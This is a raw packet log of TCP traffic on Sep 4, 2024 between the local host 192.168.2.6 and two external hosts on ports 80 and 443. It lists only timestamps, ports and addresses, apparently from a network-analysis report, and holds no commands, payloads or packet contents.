Sep 4, 2024 17:37:10.280776978 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.280785084 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.280798912 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.280819893 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.330899000 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.330909014 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.330918074 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.330926895 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.330936909 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.330946922 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.330956936 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.330966949 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.330984116 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.330996990 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.330996990 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.331044912 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.331063986 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.331073999 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.331106901 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.331113100 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.331124067 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.331132889 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.331167936 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.331181049 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.331191063 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.331199884 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.331211090 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.331222057 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.331233025 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.331254959 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.331263065 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.331264973 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.331276894 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.331285954 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.331295013 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.331319094 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.331758976 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.331770897 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.331780910 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.331804037 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.331813097 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.331820965 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.331837893 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.331849098 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.331856966 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.331867933 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.331875086 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.331898928 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.331911087 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.331937075 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.331947088 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.331957102 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.331976891 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.331995964 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.332046032 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.332056999 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.332066059 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.332092047 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.332094908 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.332113028 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.332137108 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.332150936 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.332161903 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.332196951 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.332223892 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.332233906 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.332242966 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.332273960 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.332273960 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.332604885 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.332616091 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.332629919 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.332648039 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.332668066 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.332679987 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.332690954 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.332700014 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.332710028 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.332717896 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.332736969 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.332756996 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.332902908 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.332915068 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.332922935 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.332932949 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.332942963 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.332948923 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.332954884 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.332966089 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.332972050 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.332976103 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.332978010 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.332988977 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.332997084 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.333020926 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.333069086 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.333080053 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.333090067 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.333117008 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.333220005 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.333231926 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.333240986 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.333250999 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.333260059 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.333272934 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.333276987 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.333285093 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.333293915 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.333303928 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.333309889 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.333317041 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.333329916 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.333331108 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.333343983 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.333353996 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.333354950 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.333362103 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.333364964 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.333384991 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.333409071 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.333612919 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.333623886 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.333633900 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.333643913 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.333653927 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.333658934 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.333663940 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.333674908 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.333678007 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.333688974 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.333713055 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.333719015 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.333730936 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.333739996 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.333750963 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.333760977 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.333765984 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.333770990 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.333775043 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.333782911 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.333792925 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.333794117 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.333802938 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.333811998 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.333813906 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.333836079 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.333842993 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.334268093 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.334280014 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.334290028 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.334300995 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.334311008 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.334314108 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.334321022 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.334330082 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.334332943 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.334342957 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.334345102 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.334355116 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.334363937 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.334367037 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.334378004 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.334388971 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.334394932 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.334419966 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.334583044 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.334597111 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.334606886 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.334619045 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.334628105 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.334645987 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.334669113 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.334680080 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.334687948 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.334698915 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.334707975 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.334714890 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.334717989 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.334729910 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.334733963 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.334742069 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.334765911 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.337089062 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.337110043 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.337162018 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.337171078 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.337230921 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.337414980 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.337430000 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.337475061 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.337486029 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.337532997 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.337687969 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.337701082 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.337748051 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.337754011 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.337882042 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.339994907 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.340012074 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.340054989 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.340060949 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.340118885 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.340302944 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.340317011 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.340364933 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.340372086 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.340507030 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.340702057 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.340715885 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.340753078 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.340760946 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.340770006 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.340825081 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.341036081 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.341051102 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.341095924 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.341101885 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.341231108 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.341336012 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.341355085 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.341403008 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.341409922 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.341542006 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.366424084 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.366435051 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.366444111 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.366475105 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.366492987 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.366497993 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.366503954 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.366513968 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.366523981 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.366527081 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.366533995 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.366553068 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.366554022 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.366645098 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.366657019 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.366666079 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.366677046 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.366686106 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.366710901 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.366817951 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.366830111 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.366838932 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.366852999 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.366861105 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.366864920 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.366869926 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.366899014 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.367033005 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.367044926 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.367053032 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.367063999 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.367073059 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.367078066 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.367084026 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.367086887 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.367094040 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.367104053 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.367113113 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.367115021 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.367122889 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.367131948 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.367142916 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.367151976 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.367152929 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.367165089 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.367171049 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.367182016 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.367189884 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.367192984 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.367209911 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.367223978 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.367233038 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.367234945 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.367245913 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.367255926 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.367258072 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.367269039 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.367279053 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.367301941 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.367342949 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.367353916 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.367363930 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.367374897 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.367383957 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.367407084 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.367487907 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.367499113 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.367513895 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.367526054 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.367536068 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.367553949 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.367633104 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.367643118 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.367652893 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.367662907 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.367672920 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.367674112 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.367683887 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.367687941 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.367698908 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.367707968 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.367712021 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.367724895 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.367734909 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.367739916 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.367747068 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.367753983 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.367774010 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.367794037 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.367858887 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.367870092 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.367878914 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.367901087 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.367927074 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.367995024 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.368005037 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.368015051 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.368025064 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.368033886 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.368037939 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.368052006 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.368057966 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.368063927 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.368072987 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.368076086 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.368100882 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.368120909 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.368139982 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.368150949 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.368185043 CEST	49719	80	192.168.2.6	147.45.44.104
